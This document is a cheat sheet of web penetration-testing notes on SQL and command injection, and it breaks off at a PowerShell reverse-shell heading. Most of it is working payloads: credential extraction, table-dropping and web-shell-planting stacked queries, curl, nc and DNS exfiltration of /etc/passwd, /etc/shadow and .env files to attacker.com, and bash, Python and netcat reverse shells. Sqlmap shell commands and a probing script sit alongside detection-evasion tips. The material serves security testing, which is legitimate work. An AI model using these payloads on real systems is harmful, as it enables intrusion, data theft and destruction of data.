# Web VAPT & Bug Bounty Notes
## SQL Injection (SQLi)
### Basic Concepts
Manipulate database queries through user input to extract data, bypass authentication, or execute commands.
ORMs and prepared statements have reduced SQLi, but vulnerabilities persist in legacy code and raw queries, and in the form of NoSQL injection and second-order SQLi. Focus on time-based blind techniques and WAF bypass.
### Common Injection Points
# GET Parameters (most common)
GET /product?id=1' HTTP/1.1
GET /search?query=admin'-- HTTP/1.1
GET /user?name=test' OR '1'='1 HTTP/1.1
# POST Parameters (form data)
POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
username=admin'&password=test
username=admin' OR '1'='1'--&password=anything
# HTTP Headers (less common but high impact)
GET / HTTP/1.1
User-Agent: Mozilla/5.0' OR 1=1--
X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3--
Cookie: sessionid=abc123'; DROP TABLE users;--
Referer: http://site.com/page' AND 1=2 UNION SELECT NULL--
# JSON Parameters (modern APIs)
POST /api/login HTTP/1.1
Content-Type: application/json
{"username":"admin\"' OR '1'='1'--","password":"test"}
{"id":"1' UNION SELECT NULL,NULL,NULL--"}
# XML Parameters (SOAP/XML APIs)
POST /api/data HTTP/1.1
Content-Type: application/xml
<user><id>1' OR 1=1--</id></user>
<query><term>test' UNION SELECT NULL--</term></query>
# GraphQL (emerging attack surface in 2025)
POST /graphql HTTP/1.1
Content-Type: application/json
{"query":"{ user(id: \"1' OR '1'='1\") { name email } }"}
# WebSocket messages (real-time applications)
{"action":"getUser","id":"1' OR 1=1--"}
# OPSEC: Multipart form data (file upload + SQLi)
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="filename"
test' OR 1=1--.jpg
------WebKitFormBoundary--
### Detection Techniques
-- Basic detection payloads (trigger errors or different behavior)
'
"
`
')
"))
`))
';--
";--
`--
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'x'='x
" OR "x"="x
admin' OR '1'='1
admin' OR 1=1#
admin' OR 1=1/*
-- Boolean-based detection (true/false responses)
' AND '1'='1 -- Should return normal result
' AND '1'='2 -- Should return different/empty result
-- Error-based detection (force database errors)
-- MySQL
' AND (SELECT * FROM (SELECT(SLEEP(0)))a)--
'+(SELECT 0 WHERE 1=0)+'
-- PostgreSQL
' AND 1=CAST('a' AS INTEGER)--
'||(SELECT version())||'
-- MSSQL
' AND 1=CONVERT(INT, @@version)--
'+CAST(@@version AS INT)+'
-- Oracle
' AND 1=CAST('a' AS NUMBER)--
'||(SELECT banner FROM v$version WHERE ROWNUM=1)||'
-- Time-based detection (OPSEC: most reliable; no visible errors in the response, though the delay itself still shows up in server-side slow-query logs and response-time monitoring)
-- MySQL
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND SLEEP(5)--
' RLIKE SLEEP(5)--
' OR SLEEP(5)--
-- PostgreSQL
' AND (SELECT pg_sleep(5))--
'; SELECT pg_sleep(5)--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '00:00:05'--
' AND 1=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
-- Oracle
' AND DBMS_LOCK.SLEEP(5)=1--
' AND (SELECT COUNT(*) FROM ALL_USERS t1,ALL_USERS t2,ALL_USERS t3,ALL_USERS t4,ALL_USERS t5)>0--
-- SQLite (common in mobile apps)
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000)))))--
-- OPSEC: DNS-based detection (out-of-band, bypasses WAF)
-- MySQL (using LOAD_FILE)
' UNION SELECT LOAD_FILE(CONCAT('\\\\',VERSION(),'.',USER(),'.attacker.com\\a'))--
-- MSSQL (using master..xp_dirtree)
'; EXEC master..xp_dirtree '\\\\attacker.com\\a'--
-- Oracle (using UTL_HTTP or UTL_INADDR)
' UNION SELECT UTL_HTTP.REQUEST('http://'||(SELECT user FROM dual)||'.attacker.com') FROM dual--
' UNION SELECT UTL_INADDR.get_host_name((SELECT user FROM dual)||'.attacker.com') FROM dual--
-- PostgreSQL (using COPY or dblink)
'; COPY (SELECT '') TO PROGRAM 'nslookup attacker.com'--
### Union-Based SQLi
-- Determine number of columns (binary search approach - faster)
' ORDER BY 1-- ✓
' ORDER BY 10-- ✓
' ORDER BY 20-- ✗ (error means between 10-20)
' ORDER BY 15-- ✓
' ORDER BY 18-- ✗ (error means at most 17 columns; confirm with 17)
' ORDER BY 17-- ✓
-- Alternative: NULL-based column detection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
-- Continue until no error (more reliable than ORDER BY)
-- Find injectable columns (determine data types)
' UNION SELECT 1,2,3,4,5,6,7--
' UNION SELECT 'a',2,3,4,5,6,7-- -- Test for string columns
' UNION SELECT 1,'b',3,4,5,6,7--
-- Continue to identify which columns display in response
-- Extract database information (MySQL)
' UNION SELECT 1,database(),version(),4,5,6,7--
' UNION SELECT 1,user(),@@hostname,@@datadir,5,6,7--
' UNION SELECT 1,GROUP_CONCAT(schema_name),3,4,5,6,7 FROM information_schema.schemata--
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5,6,7 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7 FROM users--
-- MySQL 8.0+ specific (JSON functions for extraction)
' UNION SELECT 1,JSON_ARRAYAGG(username),JSON_ARRAYAGG(password),4,5,6,7 FROM users--
-- Extract data with encoding (bypass filters)
' UNION SELECT 1,TO_BASE64(username),TO_BASE64(password),4,5,6,7 FROM users--
' UNION SELECT 1,HEX(username),HEX(password),4,5,6,7 FROM users--
-- PostgreSQL (version 12+ features)
' UNION SELECT 1,current_database(),version(),4,5,6,7--
' UNION SELECT 1,current_user,inet_server_addr()::text,4,5,6,7--
' UNION SELECT 1,STRING_AGG(tablename,','),3,4,5,6,7 FROM pg_tables WHERE schemaname='public'--
' UNION SELECT 1,STRING_AGG(column_name,','),3,4,5,6,7 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,STRING_AGG(username||':'||password,','),3,4,5,6,7 FROM users--
-- MSSQL (2019/2022 features)
' UNION SELECT 1,db_name(),@@version,4,5,6,7--
' UNION SELECT 1,SYSTEM_USER,HOST_NAME(),4,5,6,7--
' UNION SELECT 1,STRING_AGG(name,','),3,4,5,6,7 FROM sys.databases--
' UNION SELECT 1,STRING_AGG(name,','),3,4,5,6,7 FROM sys.tables--
' UNION SELECT 1,STRING_AGG(name,','),3,4,5,6,7 FROM sys.columns WHERE object_id=OBJECT_ID('users')--
' UNION SELECT 1,STRING_AGG(username+':'+password,','),3,4,5,6,7 FROM users--
-- Oracle (19c/21c features)
' UNION SELECT 1,user,banner,4,5,6,7 FROM v$version WHERE ROWNUM=1--
' UNION SELECT 1,LISTAGG(table_name,',') WITHIN GROUP(ORDER BY table_name),3,4,5,6,7 FROM all_tables WHERE owner='SYSTEM'--
' UNION SELECT 1,LISTAGG(column_name,',') WITHIN GROUP(ORDER BY column_name),3,4,5,6,7 FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT 1,LISTAGG(username||':'||password,',') WITHIN GROUP(ORDER BY username),3,4,5,6,7 FROM users WHERE ROWNUM<=100--
-- OPSEC: Extract data in chunks (avoid large responses that trigger alerts)
' UNION SELECT 1,SUBSTRING(GROUP_CONCAT(password),1,100),3,4,5,6,7 FROM users--
' UNION SELECT 1,SUBSTRING(GROUP_CONCAT(password),101,100),3,4,5,6,7 FROM users--
-- OPSEC: Use LIMIT/OFFSET for pagination
' UNION SELECT 1,username,password,4,5,6,7 FROM users LIMIT 1 OFFSET 0--
' UNION SELECT 1,username,password,4,5,6,7 FROM users LIMIT 1 OFFSET 1--
### Blind SQLi Techniques
-- Boolean-based blind SQLi (content-based)
-- Test true condition (should return normal page)
' AND 1=1--
' AND 'a'='a--
' AND SUBSTRING(user(),1,1)='r'--
-- Test false condition (should return different/error page)
' AND 1=2--
' AND 'a'='b--
' AND SUBSTRING(user(),1,1)='x'--
-- Extract data character by character (MySQL)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>110--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=112-- (found 'p')
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),2,1))=97-- (found 'a')
-- Binary search optimization (faster extraction)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) BETWEEN 65 AND 90-- (uppercase)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) BETWEEN 97 AND 122-- (lowercase)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) BETWEEN 48 AND 57-- (digit)
-- Time-based blind SQLi (most reliable in 2025)
-- MySQL
' AND IF(1=1,SLEEP(5),0)--
' AND IF((SELECT LENGTH(database()))>5,SLEEP(5),0)--
' AND IF((SELECT ASCII(SUBSTRING(database(),1,1)))=116,SLEEP(5),0)-- (test for 't')
' AND IF((SELECT COUNT(*) FROM users)>10,SLEEP(5),0)--
-- Optimized time-based extraction (batch testing)
' AND IF((SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1) IN (97,98,99,100),SLEEP(5),0)--
-- PostgreSQL
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (SELECT LENGTH(current_database()))>5 THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (SELECT ASCII(SUBSTRING(current_database(),1,1)))=112 THEN pg_sleep(5) ELSE pg_sleep(0) END--
-- MSSQL
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; IF (LEN(DB_NAME())>4) WAITFOR DELAY '00:00:05'--
'; IF (ASCII(SUBSTRING((SELECT TOP 1 password FROM users),1,1))=112) WAITFOR DELAY '00:00:05'--
-- Oracle
' AND (SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(5) ELSE 0 END FROM dual)=1--
' AND (SELECT CASE WHEN LENGTH(user)>5 THEN DBMS_LOCK.SLEEP(5) ELSE 0 END FROM dual)=1--
-- OPSEC: Conditional time delays (reduce noise)
-- Only delay when condition is true, normal response when false
' AND IF((SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a',SLEEP(3),0)--
-- OPSEC: Use shorter delays (faster + less detectable)
' AND IF(1=1,SLEEP(1),0)-- -- 1 second instead of 5
-- OPSEC: Heavy query-based delays (alternative to SLEEP)
-- MySQL
' AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C)>0--
-- MSSQL
' AND (SELECT COUNT(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3)>0--
-- Blind SQLi with DNS exfiltration (out-of-band)
-- MySQL
' AND (SELECT LOAD_FILE(CONCAT('\\\\',SUBSTRING(password,1,32),'.attacker.com\\a')) FROM users LIMIT 1)--
-- PostgreSQL (requires admin privileges)
'; COPY (SELECT password FROM users LIMIT 1) TO PROGRAM 'nslookup $(cat).attacker.com'--
-- MSSQL
'; DECLARE @q VARCHAR(1024); SELECT @q=(SELECT TOP 1 password FROM users); EXEC('master..xp_dirtree "\\'+@q+'.attacker.com\a"')--
### Advanced SQLi Techniques
-- Stacked queries (multiple statements - high impact)
-- PostgreSQL, MSSQL (both support stacked queries)
'; DROP TABLE users;--
'; CREATE TABLE backdoor (cmd VARCHAR(8000));--
'; INSERT INTO backdoor VALUES ('<?php system($_GET["c"]); ?>');--
'; EXEC xp_cmdshell 'whoami';--
-- MySQL (stacked queries work with mysqli_multi_query)
'; UPDATE users SET password='hacked' WHERE username='admin';--
'; INSERT INTO users (username,password,role) VALUES ('hacker','pass','admin');--
-- Second-order SQLi (payload stored then executed later)
-- Step 1: Store malicious payload
INSERT INTO users (username, bio) VALUES ('admin', 'bio' UNION SELECT password FROM users--')
-- Step 2: Payload fires later, when the stored bio is read back and spliced unescaped into a second query (the SELECT below only retrieves it; the injection happens wherever that stored value is reused to build SQL)
SELECT bio FROM users WHERE username='admin'
-- Error-based SQLi (extract data via error messages)
-- MySQL (UpdateXML, ExtractValue)
' AND UpdateXML(1,CONCAT(0x7e,(SELECT database()),0x7e),1)--
' AND ExtractValue(1,CONCAT(0x7e,(SELECT user()),0x7e))--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT password FROM users LIMIT 1),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
-- PostgreSQL (CAST errors)
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS INT)--
' AND 1=CAST((SELECT version()) AS INT)--
-- MSSQL (CAST/CONVERT errors)
' AND 1=CONVERT(INT, (SELECT TOP 1 password FROM users))--
' AND 1=CAST((SELECT @@version) AS INT)--
-- Oracle (invalid type conversion)
' AND 1=TO_NUMBER((SELECT banner FROM v$version WHERE ROWNUM=1))--
-- Out-of-band (OOB) SQLi (2025 techniques)
-- MySQL (DNS exfiltration via LOAD_FILE)
' UNION SELECT LOAD_FILE(CONCAT('\\\\',VERSION(),'.',USER(),'.attacker.com\\a'))--
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(password) FROM users LIMIT 1),'.attacker.com\\a'))--
-- MSSQL (multiple OOB methods)
-- xp_dirtree (most common)
'; DECLARE @v VARCHAR(1024); SELECT @v=password FROM users; EXEC('master..xp_dirtree "\\'+@v+'.attacker.com\a"')--
-- xp_fileexist
'; DECLARE @v VARCHAR(1024); SELECT @v=password FROM users; EXEC('master..xp_fileexist "\\'+@v+'.attacker.com\a"')--
-- fn_xe_file_target_read_file (SQL Server 2012+)
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'nslookup attacker.com';--
-- PostgreSQL (requires privileges)
'; CREATE TABLE exfil (data text); COPY exfil FROM PROGRAM 'curl http://attacker.com/exfil?data=$(cat /etc/passwd|base64)';--
-- Oracle (requires Java privileges - rare)
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/exfil?data='||RAWTOHEX(password)) FROM users WHERE ROWNUM=1--
' UNION SELECT UTL_INADDR.get_host_address((SELECT password FROM users WHERE ROWNUM=1)||'.attacker.com') FROM dual--
-- NoSQL Injection (MongoDB, 2025 focus)
-- Authentication bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": ".*"}}
-- Data extraction via regex
{"username": "admin", "password": {"$regex": "^a.*"}} // Password starts with 'a'
{"username": "admin", "password": {"$regex": "^ab.*"}} // Starts with 'ab'
-- JavaScript injection in MongoDB
{"username": "admin", "password": {"$where": "this.password.match(/^a/)"}}
{"username": "admin", "password": {"$where": "sleep(5000)"}} // Time-based
-- Operator injection
{"username": "admin", "password": {"$gt": ""}}
{"$where": "this.username == 'admin' && this.password.match(/^pass/)"}
### SQLi Automation Tools
# SQLMap (still the gold standard in 2025)
# Basic usage
sqlmap -u "http://target.com/page?id=1" --batch --random-agent
# Complete database enumeration
sqlmap -u "http://target.com/page?id=1" --dbs --random-agent --threads=5
sqlmap -u "http://target.com/page?id=1" -D database_name --tables --random-agent
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --columns --random-agent
sqlmap -u "http://target.com/page?id=1" -D database_name -T users -C username,password --dump --random-agent
# Using request file from Burp (recommended approach)
sqlmap -r request.txt --batch --level=5 --risk=3 --random-agent --threads=10
# POST data injection
sqlmap -u "http://target.com/login" --data="username=admin&password=test" --level=3 --risk=2
# Cookie injection
sqlmap -u "http://target.com/page" --cookie="sessionid=abc123" --level=2 --risk=2
# Header injection (User-Agent, Referer, X-Forwarded-For)
sqlmap -u "http://target.com/page" --headers="X-Forwarded-For: 1.1.1.1*" --level=3
# JSON injection (modern APIs)
sqlmap -u "http://target.com/api/user" --data='{"id":"1*"}' --method=POST --level=3 --risk=3
# GraphQL injection
sqlmap -u "http://target.com/graphql" --data='{"query":"{ user(id: \"1*\") { name } }"}' --method=POST
# Advanced options (OS shell, file operations)
sqlmap -u "http://target.com/page?id=1" --os-shell # Try to get OS shell
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd" # Read files
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php" # Upload files
# Tamper scripts (WAF bypass - 2025 effective combinations)
sqlmap -u "http://target.com/page?id=1" --tamper="between,randomcase,space2comment" --random-agent
sqlmap -u "http://target.com/page?id=1" --tamper="charencode,base64encode,randomcase" --random-agent
sqlmap -u "http://target.com/page?id=1" --tamper="apostrophemask,apostrophenullencode,appendnullbyte" --random-agent
# OPSEC: Rate-limited testing (avoid detection)
sqlmap -u "http://target.com/page?id=1" --delay=2 --randomize=param --random-agent --tor
# OPSEC: Use proxy chains
sqlmap -u "http://target.com/page?id=1" --proxy="socks5://127.0.0.1:9050" --check-tor --random-agent
# OPSEC: Minimal noise approach
sqlmap -u "http://target.com/page?id=1" --technique=T --level=1 --risk=1 --threads=1 --delay=3
# Modern alternatives (2025)
# Ghauri - Fast, modern SQLi tool
ghauri -u "http://target.com/page?id=1" --level=3 --risk=3 --batch
ghauri -r request.txt --threads=5 --dump-all --batch
# NoSQLMap - MongoDB injection
nosqlmap -u "http://target.com/api/login" -p '{"username":"admin","password":"test"}'
# Custom automated testing script (OPSEC-focused)
#!/bin/bash
# Usage: ./sqli_test.sh "http://target.com/page?id=1"
# Appends each probe string from the two arrays below to the URL given as $1,
# fetches it with curl, and writes what it observed to a timestamped text file.
# Defender note: every request made here lands in the web server / WAF log with
# the probe string visible in the query string, and the time-based probes also
# stand out as unusually slow requests in response-time monitoring.
url="$1"
output="sqli_results_$(date +%Y%m%d_%H%M%S).txt"
delay=2 # OPSEC: Delay between requests
# tee without -a creates (or overwrites) the log file; later writes append.
echo "[*] Testing SQL injection on: $url" | tee "$output"
# Time-based detection payloads (least noisy)
time_payloads=(
"' AND SLEEP(5)--"
"' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--"
"' AND BENCHMARK(5000000,MD5('A'))--"
"'; WAITFOR DELAY '00:00:05'--"
"' AND pg_sleep(5)--"
)
for payload in "${time_payloads[@]}"; do
echo "[*] Testing: $payload" | tee -a "$output"
# Measure response time
# Whole-second resolution (date +%s), so a delay near the 5s threshold can be
# missed or over-counted by up to a second; --max-time 10 caps how long a
# single request is waited on.
start_time=$(date +%s)
response=$(curl -s "${url}${payload}" --max-time 10)
end_time=$(date +%s)
duration=$((end_time - start_time))
# Reported as VULNERABLE on round-trip time alone: a slow or overloaded target
# also crosses this threshold, so a hit here needs confirmation before it is
# treated as a finding.
if [ $duration -ge 5 ]; then
echo "[+] VULNERABLE: Time-based SQLi detected (${duration}s delay)" | tee -a "$output"
echo "[+] Payload: $payload" | tee -a "$output"
fi
sleep $delay # OPSEC: Rate limiting
done
# Error-based detection (only if time-based fails)
# NOTE(review): despite the comment above, this loop runs unconditionally;
# nothing records whether the time-based loop found anything.
error_payloads=(
"'"
"''"
"' OR '1'='1"
"' AND 1=2 UNION SELECT NULL--"
)
echo "[*] Testing error-based injection..." | tee -a "$output"
for payload in "${error_payloads[@]}"; do
echo "[*] Testing: $payload" | tee -a "$output"
# Unlike the time-based loop, this request has no --max-time.
response=$(curl -s "${url}${payload}")
# Check for common SQL errors
# Case-insensitive match anywhere in the body. Generic words such as "error",
# "warning" or "database" also appear on ordinary pages, so a match is only a
# lead to verify by hand; the first 20 lines of the body are kept for that.
if echo "$response" | grep -qiE "sql|mysql|postgresql|mssql|oracle|syntax|error|warning|database"; then
echo "[+] POTENTIAL VULNERABILITY: SQL error in response" | tee -a "$output"
echo "[+] Payload: $payload" | tee -a "$output"
echo "$response" | head -n 20 >> "$output"
fi
sleep $delay
done
echo "[*] Testing complete. Results in: $output"
### WAF Bypass Techniques
-- Comment-based bypasses (evade pattern matching)
SELECT/**/user()
SELECT/*comment*/user()
SELECT+user()
SELECT%0Auser() -- Newline
SELECT%09user() -- Tab
SELECT%0Duser() -- Carriage return
-- Case variation (simple but effective)
SeLeCt UsEr()
UNION sElEcT 1,2,3
UnIoN SeLeCt user(),database()
-- Encoding bypasses
-- URL encoding (single and double)
%55%4E%49%4F%4E%20%53%45%4C%45%43%54 -- UNION SELECT
%25%35%35%25%4E%25%34%39 -- Double encoded UN
-- Hex encoding (MySQL)
SELECT 0x48656c6c6f -- "Hello"
SELECT CONCAT(0x53454c454354, 0x2031) -- "SELECT 1"
SELECT CHAR(83,69,76,69,67,84) -- "SELECT"
-- Unicode/UTF-8 encoding
%C0%AE%C0%AE%C0%AF -- ../
%E0%80%AE%E0%80%AE%E0%80%AF -- ../ (overlong encoding)
-- Concatenation tricks
-- MySQL
SELECT CONCAT('UNI','ON')
SELECT CONCAT_WS('','SE','LE','CT')
-- MSSQL
SELECT 'UNI'+'ON'
SELECT 'SE'+'LE'+'CT'
-- PostgreSQL/Oracle
SELECT 'UNI'||'ON'
SELECT 'SE'||'LE'||'CT'
-- Alternative operators (bypass keyword filters)
-- Instead of OR, use ||
WHERE 1=1 || 1=2
-- Instead of AND, use &&
WHERE 1=1 && 2=2
-- Instead of =, use LIKE or IN
WHERE username LIKE 'admin'
WHERE username IN ('admin')
-- Instead of SUBSTRING, use MID, LEFT, RIGHT
MID((SELECT password FROM users LIMIT 1),1,1)
LEFT((SELECT password FROM users LIMIT 1),1)
-- Instead of ASCII, use ORD
ORD(MID((SELECT password FROM users LIMIT 1),1,1))
-- Whitespace bypasses (evade space filters)
SELECT%0Auser() -- Newline
SELECT%09user() -- Tab
SELECT%0Duser() -- Carriage return
SELECT%0Buser() -- Vertical tab
SELECT%A0user() -- Non-breaking space
SELECT%C2%A0user() -- UTF-8 non-breaking space
-- Parentheses manipulation
SELECT(user())
SELECT(user())FROM(dual)
SELECT user()FROM users
-- Scientific notation (bypass number filters)
SELECT 1e0 -- 1
SELECT 2e1 -- 20
WHERE id=1e0
-- Bitwise operators (obfuscation)
SELECT 1|0 -- OR
SELECT 1&1 -- AND
SELECT 1^0 -- XOR
-- OPSEC: WAF bypass with valid SQL + malicious intent
-- Use legitimate-looking queries
' UNION SELECT NULL,username,password,NULL,NULL FROM users WHERE '1'='1
' AND (SELECT 1 FROM users WHERE username='admin' AND SUBSTRING(password,1,1)='a')='1
-- OPSEC: Inline comments (MySQL specific)
SELECT /*!12345 user()*/ -- Executes only on MySQL >= 1.23.45: the digits are major, minor, release (MMmmrr), so /*!50000 means 5.0.0
SELECT /*!50000 database()*/ -- Version-specific execution
-- Advanced filter bypasses (2025 techniques)
-- String concatenation in WHERE clause
WHERE username='ad'+'min' -- MSSQL
WHERE username=CONCAT('ad','min') -- MySQL
-- Dynamic SQL construction
'; DECLARE @q VARCHAR(100); SET @q='SE'+'LECT'; EXEC(@q+' user()');--
-- JSON field extraction (bypass traditional SQL patterns)
-- MySQL 8.0+
SELECT JSON_EXTRACT(data,'$.password') FROM users WHERE id=1
-- PostgreSQL (JSONB)
SELECT data->>'password' FROM users WHERE id=1
-- MySQL PREPARE/EXECUTE via stacked queries (not a bypass of genuinely parameterized queries; it only works where the injected text is itself concatenated into dynamic SQL)
'; PREPARE stmt FROM "SELECT * FROM users"; EXECUTE stmt;--
-- XML functions (alternative data extraction)
-- MSSQL
SELECT (SELECT TOP 1 password FROM users FOR XML PATH(''))
## Command Injection
Execute arbitrary operating system commands on the server through vulnerable input fields.
Container environments (Docker, Kubernetes) and serverless functions have changed the attack landscape. Focus on container escapes, cloud metadata access, and lateral movement.
### Command Separators
# Unix/Linux separators
; id # Semicolon - execute regardless of previous command
| id # Pipe - pass output to next command
|| id # OR - execute if previous command fails
& id # Ampersand - run in background
&& id # AND - execute if previous command succeeds
$(id) # Command substitution
`id` # Backticks - command substitution (legacy but still works)
%0a id # Newline (URL encoded)
%0d id # Carriage return (URL encoded)
%0a%0d id # CRLF combination
# Windows separators
& dir # Ampersand
| dir # Pipe
|| dir # OR
&& dir # AND
%0a dir # Newline
# Universal separators (work on both Linux and Windows)
; whoami
| whoami
|| whoami ||
& whoami
&& whoami
$(whoami)
`whoami`
# OPSEC: Background execution (avoid blocking)
& sleep 10 & # Run in background, don't block response
| sleep 10 &
### Detection Techniques
# Time-based detection (most reliable, OPSEC-friendly)
# Linux
; sleep 10
| sleep 10
|| sleep 10 ||
`sleep 10`
$(sleep 10)
& sleep 10 &
# Windows
; ping -n 10 127.0.0.1
| ping -n 10 127.0.0.1
& timeout /t 10
|| ping -n 10 127.0.0.1 ||
# Cross-platform time delays (auto-detect OS)
; sleep 5 || ping -n 5 127.0.0.1
| timeout 5 || sleep 5
&& (sleep 5 || ping -n 5 127.0.0.1)
# OPSEC: Shorter delays (faster testing, less suspicious)
; sleep 3
| ping -c 3 127.0.0.1
& timeout /t 3
# DNS-based detection (out-of-band, bypasses firewalls)
; nslookup `whoami`.attacker.com
| dig $(whoami).attacker.com
|| nslookup $(id | base64 | tr -d '\n').attacker.com ||
& nslookup %USERNAME%.%COMPUTERNAME%.attacker.com
# Alternative DNS tools
; host $(whoami).attacker.com
| curl http://$(whoami).attacker.com
& ping -c 1 $(whoami).attacker.com
# HTTP-based detection (web requests to attacker server)
; curl http://attacker.com/$(whoami)
| wget http://attacker.com/?data=$(id)
& powershell -c "Invoke-WebRequest http://attacker.com/?data=$env:USERNAME"
# OPSEC: Use legitimate services for detection (blend in)
; curl https://ipinfo.io/ip
| wget -qO- https://ifconfig.me
& nslookup google.com
# Error-based detection (trigger unique errors)
; ls /nonexistent_$(whoami)
| cat /etc/passwd_test
& type C:\nonexistent_%USERNAME%
# Boolean-based detection (different responses)
; ls / && echo "success"
| test -f /etc/passwd && echo "exists"
& if exist C:\windows echo "windows"
### Blind Command Injection
# Output redirection to web-accessible location
; whoami > /var/www/html/output.txt
| id > /tmp/output && cp /tmp/output /var/www/html/
|| echo $(cat /etc/passwd) > /var/www/html/data.txt ||
& hostname > /usr/share/nginx/html/result.txt
# Alternative web paths (common in 2025)
; env > /var/www/html/env.txt
| pwd > /app/public/pwd.txt
& whoami > /opt/webapp/static/user.txt
# Windows output redirection
; whoami > C:\inetpub\wwwroot\output.txt
| dir > C:\xampp\htdocs\result.txt
& set > C:\wamp64\www\env.txt
|| echo %USERNAME% > C:\Program Files\nginx\html\user.txt ||
# Out-of-band data exfiltration (Linux)
# HTTP POST with data
; curl -X POST http://attacker.com/data -d "$(cat /etc/passwd)"
| wget --post-data="data=$(whoami)" http://attacker.com/collect
|| curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64 | tr -d '\n') ||
# Netcat exfiltration
; nc attacker.com 4444 < /etc/passwd
| cat /etc/shadow | nc attacker.com 4444
& nc -w 3 attacker.com 4444 < /etc/hosts
# DNS exfiltration (works through most firewalls)
; nslookup $(cat /etc/passwd | base64 | tr -d '\n' | cut -c1-63).attacker.com
| for i in $(cat /etc/passwd | base64 | fold -w 63); do nslookup $i.attacker.com; done
|| dig $(cat /app/.env | base64 | head -c 63).attacker.com ||
# OPSEC: Chunked exfiltration (avoid data limits)
; cat /etc/passwd | head -n 10 | base64 | xargs -I {} curl http://attacker.com/{}
| split -b 100 /etc/passwd /tmp/chunk && for f in /tmp/chunk*; do curl -d @$f http://attacker.com/; done
# Windows out-of-band exfiltration
# PowerShell web request
; powershell -c "Invoke-WebRequest -Uri http://attacker.com/data -Method POST -Body (Get-Content C:\windows\win.ini)"
& powershell -c "$data=[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\windows\win.ini')); Invoke-WebRequest http://attacker.com/$data"
# Certutil (legitimate Windows tool for file transfer)
; certutil -urlcache -split -f http://attacker.com/test.txt C:\temp\test.txt
| certutil -encode C:\windows\win.ini C:\temp\encoded.txt && certutil -urlcache -split -f http://attacker.com/upload -d @C:\temp\encoded.txt
# DNS exfiltration (Windows)
; nslookup %USERNAME%.%COMPUTERNAME%.attacker.com
| powershell -c "$env:USERNAME + '.' + $env:COMPUTERNAME + '.attacker.com' | nslookup"
# SMB exfiltration (Windows - covert channel)
; net use \\attacker.com\share /user:guest ""
| copy C:\windows\win.ini \\attacker.com\share\
### Advanced Techniques
# Reverse shells (modern techniques)
# Bash TCP reverse shell (most reliable)
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
| bash -c 'exec bash -i &>/dev/tcp/attacker.com/4444 <&1'
# Python reverse shell (common in 2025 environments)
; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Netcat reverse shell (if nc available)
; nc -e /bin/bash attacker.com 4444
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc attacker.com 4444 >/tmp/f
# OPSEC: Encrypted reverse shell (avoid IDS detection)
; openssl s_client -quiet -connect attacker.com:4444 | /bin/bash | openssl s_client -quiet -connect attacker.com:4444
# PowerShell reverse shell (Windows)
